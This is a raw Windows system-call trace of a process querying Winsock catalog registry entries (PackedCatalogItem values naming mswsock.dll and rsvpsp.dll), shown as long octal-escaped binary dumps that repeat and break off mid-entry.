\0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\355\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\355\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\356\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\0\356\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\360\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02541 896 NtClose (220, ... ) == 0x0 02542 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000002"}, ... 220, ) }, ... 220, ) == 0x0 02543 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02544 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02545 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\362\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\362\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\363\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\0\363\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\365\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\362\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\362\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\363\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\0\363\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\365\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\365\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\362\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\362\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\363\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\0\363\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\364\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\365\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02546 896 NtClose (220, ... ) == 0x0 02547 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000003"}, ... 220, ) }, ... 220, ) == 0x0 02548 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02549 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02550 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\367\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\367\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\370\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0\370\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\372\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\367\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\367\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\370\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0\370\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\372\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\372\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\367\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\367\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\370\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0\370\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\371\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\372\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02551 896 NtClose (220, ... ) == 0x0 02552 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000004"}, ... 220, ) }, ... 220, ) == 0x0 02553 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02554 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02555 896 NtAllocateVirtualMemory (-1, 1368064, 0, 4096, 4096, 4, ... 1368064, 4096, ) == 0x0 02556 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\204\370\272\2|\370\272\2\210\371\272\2\4\244`u\\12\0\0\240<_u\260\371\272\2\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\1\0\0\0\344\373\272\2\1\0\0\0\330\273\356\0\0\0\0\0=\373\220|\200\371\272\2\0\0\0\0\0\371\272\2l\373\220|q\373\220|\0\0\0\0\200\371\272\2=\373\220|\334\370\272\2\0\0\0\0\204\3\0\0\375\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\375\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\376\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0\376\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\0\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\204\370\272\2|\370\272\2\210\371\272\2\4\244`u\\12\0\0\240<_u\260\371\272\2\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\1\0\0\0\344\373\272\2\1\0\0\0\330\273\356\0\0\0\0\0=\373\220|\200\371\272\2\0\0\0\0\0\371\272\2l\373\220|q\373\220|\0\0\0\0\200\371\272\2=\373\220|\334\370\272\2\0\0\0\0\204\3\0\0\375\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\375\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\376\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0\376\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\377\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\0\